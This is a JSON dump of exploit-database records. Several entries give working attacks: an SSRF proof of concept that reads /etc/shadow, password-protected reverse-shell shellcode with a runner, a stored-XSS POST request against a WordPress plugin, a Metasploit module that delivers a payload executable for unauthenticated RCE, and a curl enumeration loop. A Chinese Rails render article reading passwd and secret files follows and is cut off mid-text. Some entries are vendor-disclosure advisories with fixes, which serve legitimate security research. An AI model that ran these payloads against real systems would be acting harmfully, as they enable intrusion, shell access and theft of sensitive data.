{"zdt": [{"lastseen": "2018-08-13T06:16:47", "bulletinFamily": "exploit", "description": "Exploit for java platform in category web applications", "modified": "2018-08-12T00:00:00", "published": "2018-08-12T00:00:00", "id": "1337DAY-ID-30870", "href": "https://0day.today/exploit/description/30870", "title": "Wavemaker Studio 6.6 - Server-Side Request Forgery Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Wavemaker Studio 6.6 - Server-Side Request Forgery (SSRF).\r\n# Exploit Author: Gionathan \"John\" Reale\r\n# Vendor Homepage: http://www.wavemaker.com/\r\n# Software Link: https://github.com/cloudjee/wavemaker/blob/master/wavemaker/wavemaker-studio/\r\n# Affected Version: 6.6\r\n# Tested on: Parrot OS\r\n# CVE : N/A\r\n \r\n# Description\r\n# Wavemaker Studio 6.6 contains an exploitable unvaildated parameter allowing an \r\n# attacker to pass dangerous content to a victim via a phishing link. The vulnerability\r\n# can also be exploited to access sensitive data or to use the server hosting Wavemaker\r\n# as a form of HTTP proxy among other things.\r\n \r\n# Proof Of Concept\r\nhttp://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=http://attackersite.com/\r\nhttp://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=file///etc/shadow\r\n \r\n# Vulnerable Code\r\n# /wavemaker-studio/services/studioService/src/com/wavemaker/studio/StudioService.java\r\n \r\n# Line 419-430\r\n@ExposeToClient\r\npublic String getContent(String inUrl) throws IOException {\r\n try {\r\n String str = getRemoteContent(inUrl);\r\n str = str.replace(\"<head>\", \"<head><base href='\" + inUrl\r\n + \"' /><base target='_blank' /><script>top.studio.startPageIFrameLoaded();</script>\");\r\n return str;\r\n } catch (Exception e) {\r\n return \"\";\r\n }\r\n}\n\n# 0day.today [2018-08-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30870"}, {"lastseen": "2018-07-17T16:00:07", "bulletinFamily": "exploit", "description": "Exploit for linux/x86-64 platform in category shellcode", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "1337DAY-ID-30733", "href": "https://0day.today/exploit/description/30733", "title": "Linux/x64 - Reverse (::1:1337/TCP) + IPv6 + Password (pwnd) #Shellcode (115 bytes)", "type": "zdt", "sourceData": "/*\r\n; Title : Reverse Shell (IPv6) with Password - Shellcode\r\n; Author : Hashim Jawad @ihack4falafel\r\n; OS : Linux kali 4.15.0-kali2-amd64 #1 SMP Debian 4.15.11-1kali1 (2018-03-21) x86_64 GNU/Linux\r\n; Arch : x86_64\r\n; Size : 115 bytes\r\n \r\nsection .text\r\n \r\nglobal _start\r\n \r\n_start:\r\n \r\n ; int socket(int domain, int type, int protocol)\r\n ; rax=41, rdi=10, rsi=1, rdx=0\r\n xor esi,esi\r\n mul esi \r\n inc esi\r\n push 10 \r\n pop rdi\r\n add al, 41\r\n syscall\r\n \r\n ; save socket fd in rdi\r\n xchg rbx,rax\r\n \r\n ; struct sockaddr_in6 struct\r\n push rdx ; scope id = 0\r\n mov rcx,0xFEFFFFFFFFFFFFFF ; link local address ::1\r\n not rcx\r\n push rcx\r\n push rdx\r\n push rdx ; sin6_flowinfo=0\r\n push word 0x3905 ; port 1337\r\n push word 10 ; sin6_family\r\n \r\n ; int connect(int sockfd, const struct sockaddr *addr,socklen_t addrlen)\r\n ; rax=42, rdi=rbx(fd), rsi=sockaddr_inet6, rdx=28 (length)\r\n push rbx\r\n pop rdi\r\n push rsp\r\n pop rsi\r\n push 28\r\n pop rdx\r\n push 42\r\n pop rax\r\n syscall\r\n \r\n ; dup2 (new, old)\r\n ; rax=33, rdi=new fd, rsi=0,1,2 (stdin, stdout, stderr)\r\n xchg rsi, rax\r\n push 0x3\r\n pop rsi\r\n_loop:\r\n push 0x21\r\n pop rax\r\n dec esi\r\n syscall\r\n loopnz _loop\r\n \r\n ; read (int fd, void *bf, size_t count)\r\n ; rax=0, rdi=0 (stdin), rsi=rsp, rdx=4 (pwnd)\r\n xor rax, rax\r\n push rax\r\n pop rdi\r\n push rax\r\n push rsp\r\n pop rsi\r\n push 0x4\r\n pop rdx\r\n syscall\r\n \r\n ; check passcode (pwnd)\r\n push 0x646e7770\r\n pop rbx\r\n cmp dword [rsi], ebx\r\n jne _nop\r\n \r\n ; int execve(cont char *filename, char *const argv[], char *const envp[])\r\n ; rax=59, rdi=/bin//sh, rsi=0, rdx=0\r\n xor rax, rax\r\n push rax\r\n mov rbx, 0x68732f2f6e69622f\r\n push rbx\r\n push rsp\r\n pop rdi\r\n push rax\r\n push rsp\r\n pop rsi\r\n cdq\r\n push 0x3b\r\n pop rax\r\n syscall\r\n \r\n_nop:\r\n nop\r\n*/\r\n \r\n#include<stdio.h>\r\n#include<string.h>\r\n \r\n \r\nunsigned char code[] = \\\r\n\"\\x31\\xf6\\xf7\\xe6\\xff\\xc6\\x6a\\x0a\\x5f\\x04\\x29\\x0f\\x05\\x48\\x93\\x52\\x48\\xb9\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xfe\\x48\\xf7\\xd1\\x51\\x52\\x52\\x66\\x68\\x05\\x39\\x66\\x6a\\x0a\\x53\\x5f\\x54\\x5e\\x6a\\x1c\\x5a\\x6a\\x2a\\x58\\x0f\\x05\\x48\\x96\\x6a\\x03\\x5e\\x6a\\x21\\x58\\xff\\xce\\x0f\\x05\\xe0\\xf7\\x48\\x31\\xc0\\x50\\x5f\\x50\\x54\\x5e\\x6a\\x04\\x5a\\x0f\\x05\\x68\\x70\\x77\\x6e\\x64\\x5b\\x39\\x1e\\x75\\x1a\\x48\\x31\\xc0\\x50\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x53\\x54\\x5f\\x50\\x54\\x5e\\x99\\x6a\\x3b\\x58\\x0f\\x05\\x90\";\r\n \r\nmain()\r\n{\r\n \r\nprintf(\"Shellcode Length: %d\\n\", (int)strlen(code));\r\n \r\nint (*ret)() = (int(*)())code;\r\n \r\nret();\r\n \r\n}\n\n# 0day.today [2018-07-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30733"}, {"lastseen": "2018-07-16T18:04:58", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-07-16T00:00:00", "published": "2018-07-16T00:00:00", "id": "1337DAY-ID-30724", "href": "https://0day.today/exploit/description/30724", "title": "Wordpress Job Manager 4.1.0 Plugin - Cross-Site Scripting Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Wordpress Plugin Job Manager v4.1.0 Stored Cross Site\r\nScripting\r\n# Google Dork: N/A\r\n# Date: 2018-07-15\r\n# Exploit Author: Berk Dusunur & Selimcan Ozdemir\r\n# Vendor Homepage: https://wpjobmanager.com\r\n# Software Link:\r\nhttps://downloads.wordpress.org/plugin/wp-job-manager.latest-stable.zip\r\n# Affected Version: v4.1.0\r\n# Tested on: Parrot OS / WinApp Server\r\n# CVE : N/A\r\n \r\n# Proof Of Concept\r\n \r\n \r\nPOST\r\n/post-a-job/?step=%00foymtv%22%20method=%22post%22%20id=%22submit-job-form%22%20class=%22job-manager-form%22%20enctype=%22multipart/form-data%22%3E%3Cscript%3Ealert(%271%27)%3C/script%3E%3Cform%20action=%22/post-a-job/?step=%00foymtv\r\nHTTP/1.1\r\nHost: target\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101\r\nFirefox/59.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer:\r\nhttps://target/post-a-job/?step=%00foymtv22%20method=%22post%22%20id=%22submit-job-form%22%20class=%22job-manager-form%22%20enctype=%22multipart/form-data%22%3E%3Cscript%3Ealert(%271%27)%3C/script%3E%3Cform%20action=%22/post-a-job/?step=%00foymtv\r\nContent-Type: multipart/form-data;\r\nboundary=---------------------------3756777582569023921817540904\r\nContent-Length: 2379\r\nCookie: wp-job-manager-submitting-job-id=88664;\r\nwp-job-manager-submitting-job-key=5ae8875580aff\r\nDNT: 1\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nCache-Control: max-age=0\r\n \r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"job_title\"\r\n \r\nteertert</p></body><script>alert('1')</script>\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"job_description\"\r\n \r\ntest</p></div></div><form input=\"\"><p></p><script>alert('1')</script><a\r\nhref=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=\">test</a>\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"job_region\"\r\n \r\n184\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"job_type\"\r\n \r\n2\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"application\"\r\n \r\nwww.google.com\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"job_location\"\r\n \r\nAdelaide, Australia\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"company_name\"\r\n \r\nteertert</p></body><script>alert('1')</script>\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"company_tagline\"\r\n \r\nteertert</p></body><script>alert('1')</script>\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"company_website\"\r\n \r\nwww.google.com\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"company_logo\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n \r\n \r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"company_poster_name\"\r\n \r\nteertert</p></body><script>alert('1')</script>\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"company_poster_email\"\r\n \r\n[email\u00a0protected]\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"job_manager_form\"\r\n \r\nsubmit-job\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"job_id\"\r\n \r\n0\r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"step\"\r\n \r\n \r\n-----------------------------3756777582569023921817540904\r\nContent-Disposition: form-data; name=\"submit_job\"\r\n \r\nPreview\r\n-----------------------------3756777582569023921817540904--\n\n# 0day.today [2018-07-16] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30724"}, {"lastseen": "2018-07-13T03:59:18", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a remote code execution vulnerability that exists in Exchange Reporter Plus versions 5310 and below, caused by execution of bcp.exe file inside ADSHACluster servlet", "modified": "2018-07-13T00:00:00", "published": "2018-07-13T00:00:00", "id": "1337DAY-ID-30712", "href": "https://0day.today/exploit/description/30712", "title": "#ManageEngine Exchange Reporter Plus Unauthenticated Remote Code Execution Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Manage Engine Exchange Reporter Plus Unauthenticated RCE',\r\n 'Description' => %q{\r\n This module exploits a remote code execution vulnerability that\r\n exists in Exchange Reporter Plus <= 5310, caused by execution of\r\n bcp.exe file inside ADSHACluster servlet\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Kacper Szurek <[email\u00a0protected]>'\r\n ],\r\n 'References' =>\r\n [\r\n ['URL', 'https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html']\r\n ],\r\n 'Platform' => ['win'],\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Targets' => [['Automatic', {}]],\r\n 'DisclosureDate' => 'Jun 28 2018',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, 'The URI of the application', '/']),\r\n Opt::RPORT(8181),\r\n ])\r\n\r\n end\r\n\r\n def bin_to_hex(s)\r\n s.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join\r\n end\r\n\r\n def check\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'GetProductVersion')\r\n })\r\n\r\n unless res\r\n vprint_error 'Connection failed'\r\n return CheckCode::Safe\r\n end\r\n\r\n unless res.code == 200\r\n vprint_status 'Target is not Manage Engine Exchange Reporter Plus'\r\n return CheckCode::Safe\r\n end\r\n\r\n begin\r\n json = res.get_json_document\r\n raise if json.empty? || !json['BUILD_NUMBER']\r\n rescue\r\n vprint_status 'Target is not Manage Engine Exchange Reporter Plus'\r\n return CheckCode::Safe\r\n end\r\n\r\n vprint_status \"Version: #{json['BUILD_NUMBER']}\"\r\n\r\n if json['BUILD_NUMBER'].to_i <= 5310\r\n return CheckCode::Appears\r\n end\r\n\r\n CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'ADSHACluster'),\r\n 'vars_post' => {\r\n 'MTCALL' => \"nativeClient\",\r\n 'BCP_RLL' => \"0102\",\r\n 'BCP_EXE' => bin_to_hex(generate_payload_exe)\r\n }\r\n })\r\n end\r\nend\n\n# 0day.today [2018-07-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30712"}, {"lastseen": "2018-03-13T20:30:43", "bulletinFamily": "exploit", "description": "RedTeam Pentesting discovered an information disclosure vulnerability in OrbiTeam's BSCW collaboration software. An unauthenticated attacker can disclose metadata about internal objects which are stored in BSCW. Versions 5.0.7 and below are affected.", "modified": "2014-05-09T00:00:00", "published": "2014-05-09T00:00:00", "id": "1337DAY-ID-22226", "href": "https://0day.today/exploit/description/22226", "type": "zdt", "title": "OrbiTeam BSCW 5.0.7 Metadata Information Disclosure Vulnerability", "sourceData": "RedTeam Pentesting discovered an information disclosure vulnerability in\r\nOrbiTeam's BSCW collaboration software. An unauthenticated attacker can\r\ndisclose metadata about internal objects which are stored in BSCW.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nProduct: BSCW\r\nAffected Versions: BSCW <=5.0.7\r\nFixed Versions: BSCW >=5.0.8\r\nVulnerability Type: Information Disclosure\r\nSecurity Risk: medium\r\nVendor URL: http://www.bscw.de/english/product.html\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-003\r\nAdvisory Status: published\r\nCVE: CVE-2014-2301\r\nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2301\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n\"The BSCW shared workspace system is the tool of choice for efficient\r\ngroup collaboration. BSCW permits the creation of documents,\r\nappointments, contacts, tasks and notes within shared workspaces.\r\nWithout having to install additional software, team members can access\r\nthis data around-the-clock, from anywhere in the world. Mission-critical\r\ninformation is constantly available to all authorised personnel\r\nregardless of location, ensuring that complex workflows can be\r\ncoordinated with minimal effort.\"\r\n\r\n(from OrbiTeam's homepage)\r\n\r\n\r\nMore Details\r\n============\r\n\r\nBSCW uses the URL parameter \"op\" to select different functions of the\r\napplication. For example the password reset dialog can be used by\r\nopening the following URL:\r\n\r\nhttps://www.example.com/pub/bscw.cgi/?op=chpwd\r\n\r\nThe server maps the value provided by the parameter \"op\" to locally\r\nstored python modules which provide handler functions that are called to\r\ngenerate HTTP responses. It was discovered that sensitive metadata about\r\ninternally stored objects of BSCW can be disclosed by using the \"inf\"\r\noperation.\r\n\r\nWhen opening the following URL, the filename of a document which\r\nis identified by the value \"12345\" is disclosed in the response\r\nsent by the server (output shortened):\r\n\r\n$ curl --header 'Cookie: _pub_bscws=\"e4efb9e7ace7a12de82aa7a4aff1ab2a:1\"' \\\r\n \"http://www.example.com/pub/bscw.cgi/12345?op=inf\"\r\n[...]\r\n<table summary=\"\" class=\"iTab\" border=\"0\" cellspacing=\"1\" cellpadding=\"4\" width=\"440\">\r\n <tr valign=\"top\">\r\n <td class=\"iLabel\" id=\"small\" width=\"88\">Name</td>\r\n <td class=\"iValueB\" width=\"352\">Contract-XXXXX.doc</td>\r\n </tr>\r\n</table>\r\n[...]\r\n\r\nThe cookie used in the above command is generated by requesting the\r\nlogin page of BSCW. It is not necessary to enter credentials.\r\n\r\nBy iterating over the ids which are assigned in ascending order,\r\nattackers can enumerate the names of all objects stored in BSCW without\r\nprior authentication. This includes filenames and email addresses.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nWhen the following loop is run with a valid (but unauthenticated) BSCW\r\ncookie, it will find names for the BSCW objects 10000 to 30000:\r\n\r\n$ for id in `seq 10000 30000`; do\r\n filename = `curl --silent --header 'Cookie: _pub_bscws=\"COOKIE_COOKIE_COOKIE\"' \\\r\n \"http://www.example.com/pub/bscw.cgi/${id}?op=inf\" | \\\r\n grep \"iValueB\" | \\\r\n sed -e 's;^.*<td class=\"iValueB\" width=\"352\">\\(.*\\)</td>.*$;\\1;'`\r\n echo \"${id}: ${filename}\"\r\ndone\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nIt may be possible to add another authentication layer, for example\r\nHTTP-Authentication, to limit access to this BSCW information disclosure\r\nto persons authorized to use BSCW anyway.\r\n\r\n\r\nFix\r\n===\r\n\r\nUpdate to version 5.0.8.\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThe risk is estimated to be medium. This vulnerability does not allow\r\nattackers to access files stored in BSCW. They can however retrieve\r\nfilenames, which may be enough to draw conclusions about the\r\ncorresponding file contents, and other potentially sensitive data such\r\nas email addresses.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2014-02-20 Vulnerability identified\r\n2014-03-04 Customer approved disclosure to vendor\r\n2014-03-06 CVE number requested and assigned\r\n2014-03-07 Vendor notified\r\n2014-03-10 Vendor acknowledges vulnerability\r\n2014-04-22 Vendor released fixed version\r\n2014-05-08 Advisory released\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22226"}, {"lastseen": "2018-04-13T05:42:20", "bulletinFamily": "exploit", "description": "Offiria version 2.1.0 suffers from a cross site scripting vulnerability.", "modified": "2014-05-08T00:00:00", "published": "2014-05-08T00:00:00", "id": "1337DAY-ID-22216", "href": "https://0day.today/exploit/description/22216", "type": "zdt", "title": "Offiria 2.1.0 Cross Site Scripting Vulnerability", "sourceData": "Product: Offiria\r\nVendor: Slashes & Dots Sdn Bhd.\r\nVulnerable Version(s): 2.1.0 and probably prior\r\nTested Version: 2.1.0\r\nAdvisory Publication: April 2, 2014 [without technical details]\r\nVendor Notification: April 2, 2014 \r\nPublic Disclosure: May 7, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-2689\r\nRisk Level: Medium \r\nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)\r\nSolution Status: Solution Available\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in Offiria, which can be exploited to perform Cross-Site Scripting (XSS) attacks against users of vulnerable application.\r\n\r\n\r\n1) Reflected Cross-Site Scripting (XSS) in Offiria: CVE-2014-2689\r\n\r\n\r\nThe vulnerability exists due to insufficient sanitisation of user-supplied data in URI after \"/installer/index.php\" script that is not removed from the system by default. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\n\r\nThe following exploitation example displays \"immuniweb\" word:\r\n\r\nhttp://[host]/installer/index.php/%22onmouseover%3d%22alert%28%27immuniweb%27%29;%22%3d%22%3E\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nCurrently we are not aware of any official solution for this vulnerability. The vendor did not respond to:\r\n- 6 notifications by email\r\n- 1 notification via twitter\r\n- 1 notification via GitHub\r\n\r\nAs a temporary solution it is recommended to remove the vulnerable script or restrict access to it via .htaccess file or WAF.\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22216"}], "seebug": [{"lastseen": "2017-11-19T12:18:41", "bulletinFamily": "exploit", "description": "\u5982\u679c\u4f60\u7684\u5e94\u7528\u7a0b\u5e8f\u4f7f\u7528\u7684\u52a8\u6001\u6a21\u7248\u8def\u5f84 (\u4f8b\u5982: `render params[:id]`) \u90a3\u4e48\u4f60\u7684\u7a0b\u5e8f\u5c06\u4f1a\u5b58\u5728\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u548c\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e. \u8bf7\u628a\u4f60\u7684 Rails \u5347\u7ea7\u5230\u6700\u65b0\u7248\u672c, \u6216\u8005\u91cd\u6784\u4f60\u7684 `controllers`\u3002\r\n\r\n\u6211\u4eec\u5c06\u5c55\u793a\u5982\u4f55\u5728\u7279\u5b9a\u73af\u5883\u4e0b\u4f7f\u7528\u4ee3\u7801\u6267\u884c\u548c\u672c\u5730\u5305\u542b\u6f0f\u6d1e\u53bb\u653b\u51fb Ruby on Rails \u3002\r\nRails\u7684\u63a7\u5236\u5668\u6709\u5305\u542b\u6307\u5b9a\u6e32\u67d3\u6587\u4ef6\u7684\u529f\u80fd\uff0c\u4e3e\u4e2a\u4f8b\u5b50, \u5f53\u6211\u4eec\u8c03\u7528 show \u65b9\u6cd5\u7684\u65f6\u5019\uff0c\u5982\u679c\u6ca1\u6709\u5b9a\u4e49\u5176\u4ed6\u6e32\u67d3\u65b9\u6cd5\uff0c\u8be5\u6846\u67b6\u5c06\u4f1a\u9690\u85cf\u6e32\u67d3 `show.html.erb` \u6587\u4ef6\u3002\r\n\r\n> \u5728\u7edd\u5927\u591a\u6570\u60c5\u51b5\u4e0b\uff0c\u5f00\u53d1\u8005\u4f1a\u8f93\u51fa\u4e0d\u540c\u7684\u683c\u5f0f\uff0c\u4f8b\u5982\uff1a\u6587\u672c, JSON, XML \u6216\u8005\u5176\u4ed6\u4efb\u4f55\u683c\u5f0f\uff0c\u6216\u8005\u67e5\u770b\u4e00\u4e2a\u6587\u4ef6, \u5728\u8fd9\u79cd\u60c5\u51b5\u4e0b, \u5c31\u4f1a\u4f7f\u7528\u4e00\u4e2a\u53ef\u4ee5\u52a8\u6001\u6e32\u67d3\u7684\u6a21\u7248\u8bed\u8a00\uff0c\u4f8b\u5982 ERB, HAML, \u6216\u8005\u5176\u4ed6\u7684\u4ec0\u4e48. \u4f46\u662f\u6709\u51e0\u79cd\u65b9\u6cd5\u53ef\u4ee5\u4fee\u6539\u4ed6\u4eec\u5c55\u793a\u7684\u5185\u5bb9, \u5bf9\u6211\u4eec\u6765\u8bf4\uff0c\u6211\u4eec\u53ea\u8981\u76ef\u7740\u6e32\u67d3\u7684\u65b9\u6cd5\u5c31\u597d\u4e86. The Rails \u7684\u6587\u6863\u5b9a\u4e49\u4e86\u51e0\u79cd\u6e32\u67d3\u6a21\u7248\u548c\u5b9a\u4e49\u5185\u5bb9\u7684\u65b9\u6cd5 , \u5305\u62ec\u6307\u5b9a\u6a21\u7248\u7684\u8def\u5f84\u7684 `file:` \u53c2\u6570\u3002\r\n\r\n\r\n\u5982\u679c\u4f60\u5df2\u7ecf\u9605\u8bfb\u8fc7[\u89e3\u51b3\u65b9\u6cd5\u7684\u6587\u6863](http://guides.rubyonrails.org/layouts_and_rendering.html)\uff0c\u4f46\u662f\u4e0d\u786e\u5b9a\u4f60\u9700\u4e0d\u9700\u8981\u8fd9\u6837\u7684\u529f\u80fd\u2014\u2014\u5b9e\u9645\u4e0a\u5e76\u4e0d\u6b62\u4f60\u4e00\u4e2a\u4eba\u5b58\u5728\u8fd9\u6837\u7684\u7591\u60d1\u3002\u90a3\u4e48\u5148\u8ba9\u6211\u4eec\u770b\u770b\u4e0b\u9762\u8fd9\u6bb5\u4ee3\u7801:\r\n\r\n```\r\ndef show\r\n render params[:template]\r\nend\r\n```\r\n\r\n\u8fd9\u4e2a\u4ee3\u7801\u770b\u8d77\u6765\u4f3c\u4e4e\u5f88\u7b80\u5355,\u4f46\u662f\u8c01\u4e5f\u60f3\u4e0d\u5230\u4e00\u4e2a\u63a7\u5236\u5668\u53ea\u662f\u4e3a\u4e86\u6e32\u67d3\u6a21\u7248, \u4ed6\u5b9a\u4e49\u4e86\u4e00\u4e2a `template` \u53c2\u6570. \u4f46\u662f\u4ed6\u6ca1\u6709\u88ab\u8fc7\u6ee4\u8fc7, \u7136\u540e Rails \u5c31\u4f1a\u53bb\u627e\u6307\u5b9a\u7684\u6a21\u7248. , \u4f46\u662f\u8fd9\u4e2a\u6a21\u7248\u5728\u54ea\u5462?\u662f views \u76ee\u5f55\uff0c\u8fd8\u662f\u6839\u76ee\u5f55\uff0c\u53c8\u6216\u8005\u662f\u5176\u4ed6\u76ee\u5f55? \u96be\u9053\u4ed6\u662f\u671f\u5f85\u4e00\u4e2a\u6a21\u677f\u6587\u4ef6\u540d\uff0c\u6216\u8005\u662f\u4e00\u4e2a\u7279\u6b8a\u540e\u7f00\u7684\u6587\u4ef6\u540d \uff0c\u8fd8\u662f\u8bf4\u4e00\u4e2a\u5b8c\u6574\u7684\u8def\u5f84? \u5e26\u7740\u8fd9\u4e9b\u672a\u77e5\u7684\u95ee\u9898\u7ee7\u7eed\u63a2\u7d22\u4e0b\u53bb\u3002\r\n\r\n<br>\r\n\r\n### \u95ee\u9898\u89e3\u7b54\r\n\r\n**\u52a8\u6001\u6e32\u67d3\u673a\u5236\u662f\u7528\u4e00\u4e2a\u51fd\u6570\u89e3\u51b3\u5927\u91cf\u95ee\u9898\u7684\u6700\u597d\u7684\u4f8b\u5b50\u3002\u8fd9\u4e5f\u5c31\u662f\u4ed6\u7684\u95ee\u9898\u6240\u5728\u3002**\r\n\r\n\u8ba9\u6211\u4eec\u5047\u8bbe\u6e32\u67d3\u673a\u5236\u662f\u4ece `app/views/user/#{params[:template]}` \u8def\u5f84\u8bfb\u53d6\u6587\u4ef6 \u2013 \u8fd9\u4f3c\u4e4e\u662f\u4e00\u4e2a\u5408\u7406\u7684\u60f3\u6cd5. \u5982\u679c\u6211\u4eec\u628a template \u53c2\u6570\u7684\u503c\u8bbe\u7f6e\u4e3a dashboard ,\u4ed6\u5c06\u52a0\u8f7d `app/views/user/dashboard.{ext}`, .ext \u662f\u4e00\u4e2a\u5728\u767d\u540d\u5355\u91cc\u7684\u540e\u7f00\u540d (\u5982 .html, .haml, .html.erb, etc.)\r\n\r\n\r\n\r\n\u90a3\u8ba9\u6211\u4eec\u73b0\u5728\u60f3\u60f3\uff0c\u5982\u679c\u628a template \u7684\u503c\u8bbe\u7f6e\u4e3a: `../admin/dashboard`. \u4ed6\u5c06\u4f1a\u8fd4\u56de\u4ec0\u4e48\u6837\u7684\u7ed3\u679c\u7ed9\u6211\u4eec\u5462? \u8fd9\u53ef\u80fd\u6bd4\u8f83\u96be\u77e5\u9053, \u4f46\u662f\u6211\u4eec\u7ecf\u8fc7\u5c1d\u8bd5\u65f6\u5019\uff0c\u4ed6\u63d0\u793a\u6211\u4eec\u7f3a\u5c11\u6a21\u7248\u3002\r\n\r\n\r\n\r\n\u901a\u8fc7\u5206\u6790\u9519\u8bef\u63d0\u793a,\u53ef\u662f\u770b\u51fa\u4ed6\u8bd5\u56fe\u4ece `RAILS_ROOT/app/views`, `RAILS_ROOT` \u548c\u7cfb\u7edf\u6839\u76ee\u5f55\u53bb\u5bfb\u627e\u6587\u4ef6. \u8fd9\u6709\u70b9\u8ba9\u4eba\u86cb\u75bc, \u56e0\u4e3a\u4ed6\u4e3a\u4ec0\u4e48\u8981\u4ece\u7cfb\u7edf\u7684\u6839\u76ee\u5f55\u53bb\u5bfb\u627e\u6211\u4eec\u9700\u8981\u7684\u6a21\u7248\u6587\u4ef6\u5462?\r\n\r\n> \u901a\u8fc7\u9ed1\u5ba2\u7684\u672c\u80fd\u53cd\u5e94\uff0c\u6211\u628a\u53c2\u6570\u7684\u5185\u5bb9\u8bbe\u7f6e\u4e3a `/etc/passwd` , \u5e76\u4e14\u6211\u4eec\u786e\u5b9e\u8bfb\u53d6\u5230\u4e86 `passwd` \u6587\u4ef6. \u8fd9\u662f\u4e00\u4e2a\u91cd\u5927\u7684\u53d1\u73b0.\r\n\r\n\r\n\r\n\u65e2\u7136\u6211\u4eec\u80fd\u591f\u8bfb\u53d6 `passwd` \u6587\u4ef6\uff0c \u90a3\u4e48\u6211\u4eec\u662f\u4e0d\u662f\u4e5f\u80fd\u8bfb\u53d6\u5e94\u7528\u7a0b\u5e8f\u7684\u6e90\u7801\u548c\u914d\u7f6e\u6587\u4ef6\u5462, \u8ba9\u6211\u4eec\u628a\u53c2\u6570\u8bbe\u7f6e\u4e3a `config/initializers/secrettoken.rb` \u770b\u770b\u3002\r\n\r\n\r\n\r\n> 